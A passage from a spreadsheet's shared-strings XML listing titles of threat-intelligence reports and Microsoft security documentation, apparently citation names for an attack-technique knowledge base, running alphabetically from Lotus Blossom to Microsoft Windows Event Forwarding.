    <t>Lotus Blossom Jun 2015</t>
  </si>
  <si>
    <t>MACOS Cocoa</t>
  </si>
  <si>
    <t>MDMProfileConfigMacOS</t>
  </si>
  <si>
    <t>MDSec Detecting DOTNET</t>
  </si>
  <si>
    <t>MDSec System Calls</t>
  </si>
  <si>
    <t>MDSec macOS JXA and VSCode</t>
  </si>
  <si>
    <t>MFA Fatigue Attacks - PortSwigger</t>
  </si>
  <si>
    <t>MIT ccache</t>
  </si>
  <si>
    <t>MITRE Copernicus</t>
  </si>
  <si>
    <t>MITRE Trustworthy Firmware Measurement</t>
  </si>
  <si>
    <t>MITRECND FindAPIHash</t>
  </si>
  <si>
    <t>MMPC ISAPI Filter 2012</t>
  </si>
  <si>
    <t>MONSOON</t>
  </si>
  <si>
    <t>MRWLabs Office Persistence Add-ins</t>
  </si>
  <si>
    <t>MS14-025</t>
  </si>
  <si>
    <t>MS17-010 March 2017</t>
  </si>
  <si>
    <t>MSDN Authentication Packages</t>
  </si>
  <si>
    <t>MSDN COM Elevation</t>
  </si>
  <si>
    <t>MSDN Clipboard</t>
  </si>
  <si>
    <t>MSDN DLL Security</t>
  </si>
  <si>
    <t>MSDN HTML Applications</t>
  </si>
  <si>
    <t>MSDN InstallUtil</t>
  </si>
  <si>
    <t>MSDN MSBuild</t>
  </si>
  <si>
    <t>MSDN Regasm</t>
  </si>
  <si>
    <t>MSDN Regsvcs</t>
  </si>
  <si>
    <t>MSDN System Time</t>
  </si>
  <si>
    <t>MSDN VBA in Office</t>
  </si>
  <si>
    <t>MSDN WMI</t>
  </si>
  <si>
    <t>MSRC Nobelium June 2021</t>
  </si>
  <si>
    <t>MSTIC DEV-0537 Mar 2022</t>
  </si>
  <si>
    <t>MSTIC FoggyWeb September 2021</t>
  </si>
  <si>
    <t>MSTIC GADOLINIUM September 2020</t>
  </si>
  <si>
    <t>MSTIC NOBELIUM Mar 2021</t>
  </si>
  <si>
    <t>MSTIC NOBELIUM May 2021</t>
  </si>
  <si>
    <t>MSTIC Nobelium Oct 2021</t>
  </si>
  <si>
    <t>MSTIC Nobelium Toolset May 2021</t>
  </si>
  <si>
    <t>MSitPros CMSTP Aug 2017</t>
  </si>
  <si>
    <t>MWRInfoSecurity Dynamic Hooking 2015</t>
  </si>
  <si>
    <t>Mac Backdoors are back</t>
  </si>
  <si>
    <t>Mac Forwarding Rules</t>
  </si>
  <si>
    <t>MacKeeper Bundlore Apr 2019</t>
  </si>
  <si>
    <t>MacOS Email Rules</t>
  </si>
  <si>
    <t>MacOS VNC software for Remote Desktop</t>
  </si>
  <si>
    <t>Macro Malware Targets Macs</t>
  </si>
  <si>
    <t>Magento</t>
  </si>
  <si>
    <t>MagicWeb</t>
  </si>
  <si>
    <t>Malicious Chrome Extension Numbers</t>
  </si>
  <si>
    <t>Malicious Driver Reporting Center</t>
  </si>
  <si>
    <t>Malware Analysis Report ComRAT</t>
  </si>
  <si>
    <t>Malware Archaeology PowerShell Cheat Sheet</t>
  </si>
  <si>
    <t>Malware Persistence on OS X</t>
  </si>
  <si>
    <t>Malware System Language Check</t>
  </si>
  <si>
    <t>MalwareBytes ADS July 2015</t>
  </si>
  <si>
    <t>MalwareBytes Lazarus-Andariel Conceals Code April 2021</t>
  </si>
  <si>
    <t>MalwareBytes LazyScripter Feb 2021</t>
  </si>
  <si>
    <t>MalwareBytes Ngrok February 2020</t>
  </si>
  <si>
    <t>MalwareBytes SEO</t>
  </si>
  <si>
    <t>MalwareBytes SideCopy Dec 2021</t>
  </si>
  <si>
    <t>MalwareBytes Template Injection OCT 2017</t>
  </si>
  <si>
    <t>MalwareTech Power Loader Aug 2013</t>
  </si>
  <si>
    <t>MalwareTech VFS Nov 2014</t>
  </si>
  <si>
    <t>MalwareUnicorn macOS Dylib Injection MachO</t>
  </si>
  <si>
    <t>Malwarebytes Agent Tesla April 2020</t>
  </si>
  <si>
    <t>Malwarebytes Crossrider Apr 2018</t>
  </si>
  <si>
    <t>Malwarebytes DarkComet March 2018</t>
  </si>
  <si>
    <t>Malwarebytes Dyreza November 2015</t>
  </si>
  <si>
    <t>Malwarebytes Emotet Dec 2017</t>
  </si>
  <si>
    <t>Malwarebytes Heroku Skimmers</t>
  </si>
  <si>
    <t>Malwarebytes Higaisa 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Malwarebytes IssacWiper CaddyWiper March 2022 </t>
  </si>
  <si>
    <t>Malwarebytes KONNI Evolves Jan 2022</t>
  </si>
  <si>
    <t>Malwarebytes Kimsuky June 2021</t>
  </si>
  <si>
    <t>Malwarebytes Konni Aug 2021</t>
  </si>
  <si>
    <t>Malwarebytes OSINT Leaky Buckets - Hioureas</t>
  </si>
  <si>
    <t>Malwarebytes Pony April 2016</t>
  </si>
  <si>
    <t>Malwarebytes RokRAT VBA January 2021</t>
  </si>
  <si>
    <t>Malwarebytes Saint Bot April 2021</t>
  </si>
  <si>
    <t>Malwarebytes Silent Librarian October 2020</t>
  </si>
  <si>
    <t>Malwarebytes SmokeLoader 2016</t>
  </si>
  <si>
    <t>Malwarebytes Targeted Attack against Saudi Arabia</t>
  </si>
  <si>
    <t>Malwarebytes The Windows Vault</t>
  </si>
  <si>
    <t>Malwarebytes TrickBot Sep 2019</t>
  </si>
  <si>
    <t>Malwarebytes Wow6432Node 2016</t>
  </si>
  <si>
    <t>Man LD.SO</t>
  </si>
  <si>
    <t>Man Pam_Unix</t>
  </si>
  <si>
    <t>Mandiant - Synful Knock</t>
  </si>
  <si>
    <t>Mandiant APT1</t>
  </si>
  <si>
    <t>Mandiant APT1 Appendix</t>
  </si>
  <si>
    <t>Mandiant APT29 Trello</t>
  </si>
  <si>
    <t xml:space="preserve">Mandiant APT41 Global Intrusion </t>
  </si>
  <si>
    <t>Mandiant APT42</t>
  </si>
  <si>
    <t>Mandiant Azure AD Backdoors</t>
  </si>
  <si>
    <t>Mandiant BYOL</t>
  </si>
  <si>
    <t>Mandiant BYOL 2018</t>
  </si>
  <si>
    <t>Mandiant Defend UNC2452 White Paper</t>
  </si>
  <si>
    <t>Mandiant Endpoint Evading 2019</t>
  </si>
  <si>
    <t>Mandiant FIN5 GrrCON Oct 2016</t>
  </si>
  <si>
    <t>Mandiant Glyer APT 2010</t>
  </si>
  <si>
    <t>Mandiant M Trends 2011</t>
  </si>
  <si>
    <t>Mandiant M Trends 2016</t>
  </si>
  <si>
    <t>Mandiant M-Trends 2015</t>
  </si>
  <si>
    <t>Mandiant M-Trends 2020</t>
  </si>
  <si>
    <t>Mandiant No Easy Breach</t>
  </si>
  <si>
    <t>Mandiant Operation Ke3chang November 2014</t>
  </si>
  <si>
    <t>Mandiant SCANdalous Jul 2020</t>
  </si>
  <si>
    <t>Mandiant UNC2589 March 2022</t>
  </si>
  <si>
    <t>Mandiant UNC3313 Feb 2022</t>
  </si>
  <si>
    <t>Mandiant UNC3890 Aug 2022</t>
  </si>
  <si>
    <t>Mandiant Ukraine Cyber Threats January 2022</t>
  </si>
  <si>
    <t>Mandiant golang stripped binaries explanation</t>
  </si>
  <si>
    <t>Mavinject Functionality Deconstructed</t>
  </si>
  <si>
    <t>McAfee APT28 DDE1 Nov 2017</t>
  </si>
  <si>
    <t>McAfee APT28 DDE2 Nov 2017</t>
  </si>
  <si>
    <t>McAfee Babuk February 2021</t>
  </si>
  <si>
    <t>McAfee Bankshot</t>
  </si>
  <si>
    <t>McAfee CHIPSEC Blog</t>
  </si>
  <si>
    <t>McAfee Cuba April 2021</t>
  </si>
  <si>
    <t>McAfee Dianxun March 2021</t>
  </si>
  <si>
    <t>McAfee GhostSecret</t>
  </si>
  <si>
    <t>McAfee Gold Dragon</t>
  </si>
  <si>
    <t>McAfee Honeybee</t>
  </si>
  <si>
    <t>McAfee Lazarus Jul 2020</t>
  </si>
  <si>
    <t>McAfee Lazarus Nov 2020</t>
  </si>
  <si>
    <t>McAfee Lazarus Resurfaces Feb 2018</t>
  </si>
  <si>
    <t>McAfee Malicious Doc Targets Pyeongchang Olympics</t>
  </si>
  <si>
    <t>McAfee Maze March 2020</t>
  </si>
  <si>
    <t>McAfee Netwire Mar 2015</t>
  </si>
  <si>
    <t>McAfee Night Dragon</t>
  </si>
  <si>
    <t>McAfee Oceansalt Oct 2018</t>
  </si>
  <si>
    <t>McAfee REvil October 2019</t>
  </si>
  <si>
    <t>McAfee Sandworm November 2013</t>
  </si>
  <si>
    <t>McAfee Shamoon December 2018</t>
  </si>
  <si>
    <t>McAfee Shamoon December19 2018</t>
  </si>
  <si>
    <t>McAfee Sharpshooter December 2018</t>
  </si>
  <si>
    <t>McAfee Sodinokibi October 2019</t>
  </si>
  <si>
    <t>McAfee Virtual Jan 2017</t>
  </si>
  <si>
    <t>McMillan Pwn March 2012</t>
  </si>
  <si>
    <t>Mcafee Clop Aug 2019</t>
  </si>
  <si>
    <t>Medium Ali Salem Bumblebee April 2022</t>
  </si>
  <si>
    <t>Medium Anchor DNS July 2020</t>
  </si>
  <si>
    <t>Medium Authentication Tokens</t>
  </si>
  <si>
    <t>Medium Babuk February 2021</t>
  </si>
  <si>
    <t>Medium Certified Pre Owned</t>
  </si>
  <si>
    <t>Medium Detecting Attempts to Steal Passwords from Memory</t>
  </si>
  <si>
    <t>Medium Detecting Lateral Movement</t>
  </si>
  <si>
    <t>Medium Detecting WMI Persistence</t>
  </si>
  <si>
    <t>Medium DnsTunneling</t>
  </si>
  <si>
    <t>Medium Eli Salem GuLoader April 2021</t>
  </si>
  <si>
    <t>Medium Event Tracing Tampering 2018</t>
  </si>
  <si>
    <t>Medium KONNI Jan 2020</t>
  </si>
  <si>
    <t>Medium Metamorfo Apr 2020</t>
  </si>
  <si>
    <t>Medium Ptrace JUL 2018</t>
  </si>
  <si>
    <t>Medium S2W WhisperGate January 2022</t>
  </si>
  <si>
    <t>Medium SSL Cert</t>
  </si>
  <si>
    <t>MehtaFastFluxPt1</t>
  </si>
  <si>
    <t>MehtaFastFluxPt2</t>
  </si>
  <si>
    <t>Metasploit SSH Module</t>
  </si>
  <si>
    <t>Metcalf 2015</t>
  </si>
  <si>
    <t>Methods of Mac Malware Persistence</t>
  </si>
  <si>
    <t>Meyers Numbered Panda</t>
  </si>
  <si>
    <t>MicroFocus 9002 Aug 2016</t>
  </si>
  <si>
    <t>Microsoft - Add-MailboxPermission</t>
  </si>
  <si>
    <t>Microsoft - Azure AD App Registration - May 2019</t>
  </si>
  <si>
    <t>Microsoft - Azure AD Federation</t>
  </si>
  <si>
    <t>Microsoft - Azure AD Identity Tokens - Aug 2019</t>
  </si>
  <si>
    <t>Microsoft - Azure Sentinel ADFSDomainTrustMods</t>
  </si>
  <si>
    <t>Microsoft - Cached Creds</t>
  </si>
  <si>
    <t>Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks</t>
  </si>
  <si>
    <t>Microsoft - Device Registration</t>
  </si>
  <si>
    <t>Microsoft - OAuth Code Authorization flow - June 2019</t>
  </si>
  <si>
    <t>Microsoft - Update or Repair Federated domain</t>
  </si>
  <si>
    <t>Microsoft 365 Defender Solorigate</t>
  </si>
  <si>
    <t>Microsoft 4657 APR 2017</t>
  </si>
  <si>
    <t>Microsoft 4697 APR 2017</t>
  </si>
  <si>
    <t>Microsoft 4768 TGT 2017</t>
  </si>
  <si>
    <t>Microsoft AD Accounts</t>
  </si>
  <si>
    <t>Microsoft AD Admin Tier Model</t>
  </si>
  <si>
    <t>Microsoft AD CS Overview</t>
  </si>
  <si>
    <t>Microsoft AD DS Getting Started</t>
  </si>
  <si>
    <t>Microsoft ADS Mar 2014</t>
  </si>
  <si>
    <t>Microsoft ADV170021 Dec 2017</t>
  </si>
  <si>
    <t>Microsoft AMSI</t>
  </si>
  <si>
    <t>Microsoft AMSI June 2015</t>
  </si>
  <si>
    <t>Microsoft APC</t>
  </si>
  <si>
    <t>Microsoft ASR Nov 2017</t>
  </si>
  <si>
    <t>Microsoft AZ CLI</t>
  </si>
  <si>
    <t>Microsoft About BITS</t>
  </si>
  <si>
    <t>Microsoft About Event Tracing 2018</t>
  </si>
  <si>
    <t>Microsoft About Profiles</t>
  </si>
  <si>
    <t>Microsoft Access Control Lists May 2018</t>
  </si>
  <si>
    <t>Microsoft Actinium February 2022</t>
  </si>
  <si>
    <t>Microsoft AddPrintProcessor May 2018</t>
  </si>
  <si>
    <t>Microsoft Admin Shares</t>
  </si>
  <si>
    <t>Microsoft AlwaysInstallElevated 2018</t>
  </si>
  <si>
    <t>Microsoft Analyzing Solorigate Dec 2020</t>
  </si>
  <si>
    <t>Microsoft Anti Spoofing</t>
  </si>
  <si>
    <t>Microsoft Application Lockdown</t>
  </si>
  <si>
    <t>Microsoft Assoc Oct 2017</t>
  </si>
  <si>
    <t>Microsoft Atom Table</t>
  </si>
  <si>
    <t>Microsoft Audit Logon Events</t>
  </si>
  <si>
    <t>Microsoft Audit Registry July 2012</t>
  </si>
  <si>
    <t>Microsoft Authenticode</t>
  </si>
  <si>
    <t>Microsoft Azure AD Admin Consent</t>
  </si>
  <si>
    <t>Microsoft Azure AD Users</t>
  </si>
  <si>
    <t>Microsoft Azure Instance Metadata 2021</t>
  </si>
  <si>
    <t>Microsoft Azure Storage Security, 2019</t>
  </si>
  <si>
    <t>Microsoft Azure Virtual Network Overview</t>
  </si>
  <si>
    <t>Microsoft BEC Campaign</t>
  </si>
  <si>
    <t>Microsoft BITS</t>
  </si>
  <si>
    <t>Microsoft BITSAdmin</t>
  </si>
  <si>
    <t>Microsoft Basic TxF Concepts</t>
  </si>
  <si>
    <t>Microsoft Block Office Macros</t>
  </si>
  <si>
    <t>Microsoft Bootcfg</t>
  </si>
  <si>
    <t>Microsoft CLR Integration 2017</t>
  </si>
  <si>
    <t>Microsoft COM</t>
  </si>
  <si>
    <t>Microsoft COM ACL</t>
  </si>
  <si>
    <t>Microsoft COR_PROFILER Feb 2013</t>
  </si>
  <si>
    <t>Microsoft CVE-2017-8625 Aug 2017</t>
  </si>
  <si>
    <t>Microsoft CVE-2021-1732 Feb 2021</t>
  </si>
  <si>
    <t>Microsoft Catalog Files and Signatures April 2017</t>
  </si>
  <si>
    <t>Microsoft Change Default Programs</t>
  </si>
  <si>
    <t>Microsoft Change Normal Template</t>
  </si>
  <si>
    <t>Microsoft Clear-EventLog</t>
  </si>
  <si>
    <t>Microsoft Cloud App Security</t>
  </si>
  <si>
    <t>Microsoft Command-line Logging</t>
  </si>
  <si>
    <t>Microsoft Component Object Model</t>
  </si>
  <si>
    <t>Microsoft Configure LSA</t>
  </si>
  <si>
    <t>Microsoft Connection Manager Oct 2009</t>
  </si>
  <si>
    <t>Microsoft Create Token</t>
  </si>
  <si>
    <t>Microsoft CreateProcess</t>
  </si>
  <si>
    <t>Microsoft CredEnumerate</t>
  </si>
  <si>
    <t>Microsoft Credential Guard April 2017</t>
  </si>
  <si>
    <t>Microsoft Credential Locker</t>
  </si>
  <si>
    <t>Microsoft Credential Manager store</t>
  </si>
  <si>
    <t>Microsoft CryptUnprotectData April 2018</t>
  </si>
  <si>
    <t>Microsoft CurrentControlSet Services</t>
  </si>
  <si>
    <t>Microsoft DACL May 2018</t>
  </si>
  <si>
    <t>Microsoft DART Case Report 001</t>
  </si>
  <si>
    <t>Microsoft DDE Advisory Nov 2017</t>
  </si>
  <si>
    <t>Microsoft DEV-0537</t>
  </si>
  <si>
    <t>Microsoft DLL Preloading</t>
  </si>
  <si>
    <t>Microsoft DLL Search</t>
  </si>
  <si>
    <t>Microsoft DLL Security</t>
  </si>
  <si>
    <t>Microsoft DRSR Dec 2017</t>
  </si>
  <si>
    <t>Microsoft DSE June 2017</t>
  </si>
  <si>
    <t>Microsoft DTC</t>
  </si>
  <si>
    <t>Microsoft DUBNIUM Flash June 2016</t>
  </si>
  <si>
    <t>Microsoft DUBNIUM July 2016</t>
  </si>
  <si>
    <t>Microsoft DUBNIUM June 2016</t>
  </si>
  <si>
    <t>Microsoft Deep Dive Solorigate January 2021</t>
  </si>
  <si>
    <t>Microsoft Deploying AD Federation</t>
  </si>
  <si>
    <t>Microsoft Detect Outlook Forms</t>
  </si>
  <si>
    <t>Microsoft Detecting Kerberoasting Feb 2018</t>
  </si>
  <si>
    <t>Microsoft Dev Blog IFEO Mar 2010</t>
  </si>
  <si>
    <t>Microsoft Digital Defense FY20 Sept 2020</t>
  </si>
  <si>
    <t>Microsoft DirSync</t>
  </si>
  <si>
    <t>Microsoft Disable Autorun</t>
  </si>
  <si>
    <t>Microsoft Disable DCOM</t>
  </si>
  <si>
    <t>Microsoft Disable Macros</t>
  </si>
  <si>
    <t>Microsoft Disable NTLM Nov 2012</t>
  </si>
  <si>
    <t>Microsoft Disable VBA Jan 2020</t>
  </si>
  <si>
    <t>Microsoft Dofoil 2018</t>
  </si>
  <si>
    <t>Microsoft Driver Block Rules</t>
  </si>
  <si>
    <t>Microsoft DsAddSidHistory</t>
  </si>
  <si>
    <t>Microsoft DuplicateTokenEx</t>
  </si>
  <si>
    <t>Microsoft Dynamic Link Library Search Order</t>
  </si>
  <si>
    <t>Microsoft Dynamic-Link Library Redirection</t>
  </si>
  <si>
    <t>Microsoft Dynamic-Link Library Security</t>
  </si>
  <si>
    <t>Microsoft ETW May 2018</t>
  </si>
  <si>
    <t>Microsoft Enable Cred Guard April 2017</t>
  </si>
  <si>
    <t>Microsoft Environment Property</t>
  </si>
  <si>
    <t>Microsoft Esentutl</t>
  </si>
  <si>
    <t>Microsoft EventLog.Clear</t>
  </si>
  <si>
    <t>Microsoft Exchange Address Lists</t>
  </si>
  <si>
    <t>Microsoft Expand Utility</t>
  </si>
  <si>
    <t>Microsoft FTP</t>
  </si>
  <si>
    <t>Microsoft File Handlers</t>
  </si>
  <si>
    <t>Microsoft File Mgmt</t>
  </si>
  <si>
    <t>Microsoft File Streams</t>
  </si>
  <si>
    <t>Microsoft FinFisher March 2018</t>
  </si>
  <si>
    <t>Microsoft Forfiles Aug 2016</t>
  </si>
  <si>
    <t>Microsoft GALLIUM December 2019</t>
  </si>
  <si>
    <t>Microsoft GFlags Mar 2017</t>
  </si>
  <si>
    <t>Microsoft GPO Bluetooth FEB 2009</t>
  </si>
  <si>
    <t>Microsoft GPO Security Filtering</t>
  </si>
  <si>
    <t>Microsoft GPP 2016</t>
  </si>
  <si>
    <t>Microsoft GPP Key</t>
  </si>
  <si>
    <t>Microsoft Get-ADUser</t>
  </si>
  <si>
    <t>Microsoft Get-InboxRule</t>
  </si>
  <si>
    <t>Microsoft GetAllTrustRelationships</t>
  </si>
  <si>
    <t>Microsoft GetNCCChanges</t>
  </si>
  <si>
    <t>Microsoft GetWindowLong function</t>
  </si>
  <si>
    <t>Microsoft HAFNIUM March 2020</t>
  </si>
  <si>
    <t>Microsoft HTML Help ActiveX</t>
  </si>
  <si>
    <t>Microsoft HTML Help Executable Program</t>
  </si>
  <si>
    <t>Microsoft HTML Help May 2018</t>
  </si>
  <si>
    <t>Microsoft Hacking Team Breach</t>
  </si>
  <si>
    <t>Microsoft Holmium June 2020</t>
  </si>
  <si>
    <t>Microsoft Hook Overview</t>
  </si>
  <si>
    <t>Microsoft ICMP</t>
  </si>
  <si>
    <t>Microsoft IIS Modules Overview 2007</t>
  </si>
  <si>
    <t>Microsoft ISAPI Extension All Incoming 2017</t>
  </si>
  <si>
    <t>Microsoft ISAPI Extension Overview 2017</t>
  </si>
  <si>
    <t>Microsoft ISAPI Filter Overview 2017</t>
  </si>
  <si>
    <t>Microsoft ISAPICGIRestriction 2016</t>
  </si>
  <si>
    <t>Microsoft Identity Platform Access 2019</t>
  </si>
  <si>
    <t>Microsoft Identity Platform Protocols May 2019</t>
  </si>
  <si>
    <t>Microsoft Image</t>
  </si>
  <si>
    <t>Microsoft ImpersonateLoggedOnUser</t>
  </si>
  <si>
    <t>Microsoft Implementing CPL</t>
  </si>
  <si>
    <t>Microsoft Inbox Rules</t>
  </si>
  <si>
    <t>Microsoft Install Password Filter n.d</t>
  </si>
  <si>
    <t>Microsoft Internal Solorigate Investigation Blog</t>
  </si>
  <si>
    <t>Microsoft Issues with BITS July 2011</t>
  </si>
  <si>
    <t>Microsoft JScript 2007</t>
  </si>
  <si>
    <t>Microsoft Kasidet</t>
  </si>
  <si>
    <t>Microsoft Kerberos Golden Ticket</t>
  </si>
  <si>
    <t>Microsoft Kerberos Preauth 2014</t>
  </si>
  <si>
    <t>Microsoft Klist</t>
  </si>
  <si>
    <t>Microsoft LSA</t>
  </si>
  <si>
    <t>Microsoft LSA Protection Mar 2014</t>
  </si>
  <si>
    <t>Microsoft Lamin Sept 2017</t>
  </si>
  <si>
    <t>Microsoft Learn</t>
  </si>
  <si>
    <t>Microsoft List View Controls</t>
  </si>
  <si>
    <t>Microsoft LoadLibrary</t>
  </si>
  <si>
    <t>Microsoft Local Accounts Feb 2019</t>
  </si>
  <si>
    <t>Microsoft LogonUser</t>
  </si>
  <si>
    <t>Microsoft MOF May 2018</t>
  </si>
  <si>
    <t>Microsoft MS14-025</t>
  </si>
  <si>
    <t>Microsoft MSBuild Inline Tasks 2017</t>
  </si>
  <si>
    <t>Microsoft Manage Device Identities</t>
  </si>
  <si>
    <t>Microsoft Managing WebDAV Security</t>
  </si>
  <si>
    <t>Microsoft Manifests</t>
  </si>
  <si>
    <t>Microsoft Module Class</t>
  </si>
  <si>
    <t>Microsoft More information about DLL</t>
  </si>
  <si>
    <t>Microsoft Msolrole</t>
  </si>
  <si>
    <t>Microsoft NEODYMIUM Dec 2016</t>
  </si>
  <si>
    <t>Microsoft NET</t>
  </si>
  <si>
    <t>Microsoft NFS Overview</t>
  </si>
  <si>
    <t>Microsoft NICKEL December 2021</t>
  </si>
  <si>
    <t>Microsoft NRPC Dec 2017</t>
  </si>
  <si>
    <t>Microsoft NTFS File Attributes Aug 2010</t>
  </si>
  <si>
    <t>Microsoft Named Pipes</t>
  </si>
  <si>
    <t>Microsoft Net</t>
  </si>
  <si>
    <t>Microsoft Net Utility</t>
  </si>
  <si>
    <t>Microsoft Netdom Trust Sept 2012</t>
  </si>
  <si>
    <t>Microsoft Network access Credential Manager</t>
  </si>
  <si>
    <t>Microsoft New-InboxRule</t>
  </si>
  <si>
    <t>Microsoft Nobelium Admin Privileges</t>
  </si>
  <si>
    <t>Microsoft O365 Admin Roles</t>
  </si>
  <si>
    <t>Microsoft OAuth 2.0 Consent Phishing 2021</t>
  </si>
  <si>
    <t>Microsoft Office Add-ins</t>
  </si>
  <si>
    <t>Microsoft Open XML July 2017</t>
  </si>
  <si>
    <t>Microsoft Operation Wilysupply</t>
  </si>
  <si>
    <t>Microsoft Outlook Files</t>
  </si>
  <si>
    <t>Microsoft PEB 2021</t>
  </si>
  <si>
    <t>Microsoft PLATINUM April 2016</t>
  </si>
  <si>
    <t>Microsoft PLATINUM June 2017</t>
  </si>
  <si>
    <t>Microsoft POLONIUM June 2022</t>
  </si>
  <si>
    <t>Microsoft PSfromCsharp APR 2014</t>
  </si>
  <si>
    <t>Microsoft Phosphorus Mar 2019</t>
  </si>
  <si>
    <t>Microsoft Phosphorus Oct 2020</t>
  </si>
  <si>
    <t>Microsoft PoisonIvy 2017</t>
  </si>
  <si>
    <t>Microsoft PowerShell Command History</t>
  </si>
  <si>
    <t>Microsoft PowerShell Logging</t>
  </si>
  <si>
    <t>Microsoft Preauthentication Jul 2012</t>
  </si>
  <si>
    <t>Microsoft Preventing SMB</t>
  </si>
  <si>
    <t>Microsoft Process Creation Flags May 2018</t>
  </si>
  <si>
    <t>Microsoft Process Snapshot</t>
  </si>
  <si>
    <t>Microsoft Process Wide Com Keys</t>
  </si>
  <si>
    <t>Microsoft Processes and Threads</t>
  </si>
  <si>
    <t>Microsoft Profiles</t>
  </si>
  <si>
    <t>Microsoft Profiling Mar 2017</t>
  </si>
  <si>
    <t>Microsoft Protected Users Security Group</t>
  </si>
  <si>
    <t>Microsoft Protected View</t>
  </si>
  <si>
    <t>Microsoft PsSetCreateProcessNotifyRoutine routine</t>
  </si>
  <si>
    <t>Microsoft RDP Removal</t>
  </si>
  <si>
    <t>Microsoft Reg</t>
  </si>
  <si>
    <t>Microsoft RegDelNull July 2016</t>
  </si>
  <si>
    <t>Microsoft Reghide NOV 2006</t>
  </si>
  <si>
    <t>Microsoft Register-WmiEvent</t>
  </si>
  <si>
    <t>Microsoft Registry</t>
  </si>
  <si>
    <t>Microsoft Registry Auditing Aug 2016</t>
  </si>
  <si>
    <t>Microsoft Regsvr32</t>
  </si>
  <si>
    <t>Microsoft Remote</t>
  </si>
  <si>
    <t>Microsoft Remote Desktop Services</t>
  </si>
  <si>
    <t>Microsoft Remote Use of Local</t>
  </si>
  <si>
    <t>Microsoft Replace Process Token</t>
  </si>
  <si>
    <t>Microsoft Replication ACL</t>
  </si>
  <si>
    <t>Microsoft Run Key</t>
  </si>
  <si>
    <t>Microsoft RunAs</t>
  </si>
  <si>
    <t>Microsoft SAM</t>
  </si>
  <si>
    <t>Microsoft SAML Token Lifetimes</t>
  </si>
  <si>
    <t>Microsoft SAMR</t>
  </si>
  <si>
    <t>Microsoft SDelete July 2016</t>
  </si>
  <si>
    <t>Microsoft SID</t>
  </si>
  <si>
    <t>Microsoft SID Filtering Quarantining Jan 2009</t>
  </si>
  <si>
    <t>Microsoft SID-History Attribute</t>
  </si>
  <si>
    <t>Microsoft SIR Vol 19</t>
  </si>
  <si>
    <t>Microsoft SIR Vol 21</t>
  </si>
  <si>
    <t>Microsoft SMB Packet Signing</t>
  </si>
  <si>
    <t>Microsoft SPN</t>
  </si>
  <si>
    <t>Microsoft STRONTIUM Aug 2019</t>
  </si>
  <si>
    <t>Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020</t>
  </si>
  <si>
    <t>Microsoft Safe Mode</t>
  </si>
  <si>
    <t>Microsoft Scheduled Task Events Win10</t>
  </si>
  <si>
    <t>Microsoft Securing Privileged Access</t>
  </si>
  <si>
    <t>Microsoft Security Advisory 2269637</t>
  </si>
  <si>
    <t>Microsoft Security Event 4670</t>
  </si>
  <si>
    <t>Microsoft Security Subsystem</t>
  </si>
  <si>
    <t>Microsoft SendNotifyMessage function</t>
  </si>
  <si>
    <t>Microsoft Service Control Manager</t>
  </si>
  <si>
    <t>Microsoft Services</t>
  </si>
  <si>
    <t>Microsoft Set-InboxRule</t>
  </si>
  <si>
    <t>Microsoft SetSPN</t>
  </si>
  <si>
    <t>Microsoft SetWindowLong function</t>
  </si>
  <si>
    <t>Microsoft SharePoint Logging</t>
  </si>
  <si>
    <t>Microsoft Shutdown Oct 2017</t>
  </si>
  <si>
    <t>Microsoft Sigcheck May 2017</t>
  </si>
  <si>
    <t>Microsoft Silent Process Exit NOV 2017</t>
  </si>
  <si>
    <t>Microsoft Snapshot</t>
  </si>
  <si>
    <t>Microsoft SolarWinds Customer Guidance</t>
  </si>
  <si>
    <t>Microsoft SolarWinds Steps</t>
  </si>
  <si>
    <t>Microsoft Sub Takeover 2020</t>
  </si>
  <si>
    <t>Microsoft Support O365 Add Another Admin, October 2019</t>
  </si>
  <si>
    <t>Microsoft Sxstrace</t>
  </si>
  <si>
    <t>Microsoft Sysmon v6 May 2017</t>
  </si>
  <si>
    <t>Microsoft System Services Fundamentals</t>
  </si>
  <si>
    <t>Microsoft System Wide Com Keys</t>
  </si>
  <si>
    <t>Microsoft TESTSIGNING Feb 2021</t>
  </si>
  <si>
    <t>Microsoft Targeting Elections September 2020</t>
  </si>
  <si>
    <t>Microsoft Tasklist</t>
  </si>
  <si>
    <t>Microsoft Tasks</t>
  </si>
  <si>
    <t>Microsoft Tim McMichael Exchange Mail Forwarding 2</t>
  </si>
  <si>
    <t>Microsoft TimeProvider</t>
  </si>
  <si>
    <t>Microsoft Totbrick Oct 2017</t>
  </si>
  <si>
    <t>Microsoft TransportAgent Jun 2016</t>
  </si>
  <si>
    <t>Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017</t>
  </si>
  <si>
    <t>Microsoft Trust Considerations Nov 2014</t>
  </si>
  <si>
    <t>Microsoft Trusts</t>
  </si>
  <si>
    <t>Microsoft TxF</t>
  </si>
  <si>
    <t>Microsoft UAC Nov 2018</t>
  </si>
  <si>
    <t>Microsoft Unidentified Dec 2018</t>
  </si>
  <si>
    <t>Microsoft Unsigned Driver Apr 2017</t>
  </si>
  <si>
    <t>Microsoft User Creation Event</t>
  </si>
  <si>
    <t>Microsoft User Modified Event</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft Using Software Restriction </t>
  </si>
  <si>
    <t>Microsoft VBA</t>
  </si>
  <si>
    <t>Microsoft VBScript</t>
  </si>
  <si>
    <t>Microsoft Virutal Machine API</t>
  </si>
  <si>
    <t>Microsoft W32Time Feb 2018</t>
  </si>
  <si>
    <t>Microsoft W32Time May 2017</t>
  </si>
  <si>
    <t>Microsoft WDAC</t>
  </si>
  <si>
    <t>Microsoft WDigest Mit</t>
  </si>
  <si>
    <t>Microsoft WMI Architecture</t>
  </si>
  <si>
    <t>Microsoft WMI Filters</t>
  </si>
  <si>
    <t>Microsoft WMI System Classes</t>
  </si>
  <si>
    <t>Microsoft Well Known SIDs Jun 2017</t>
  </si>
  <si>
    <t>Microsoft Where to use TxF</t>
  </si>
  <si>
    <t>Microsoft WhisperGate January 2022</t>
  </si>
  <si>
    <t>Microsoft Win Defender Truvasys Sep 2017</t>
  </si>
  <si>
    <t>Microsoft Win32</t>
  </si>
  <si>
    <t>Microsoft WinExec</t>
  </si>
  <si>
    <t>Microsoft WinRM</t>
  </si>
  <si>
    <t>Microsoft WinVerifyTrust</t>
  </si>
  <si>
    <t>Microsoft Window Classes</t>
  </si>
  <si>
    <t>Microsoft Windows Defender Application Control</t>
  </si>
  <si>
    <t>Microsoft Windows Event Forwarding FEB 2018</t>
  </si>
  <si>
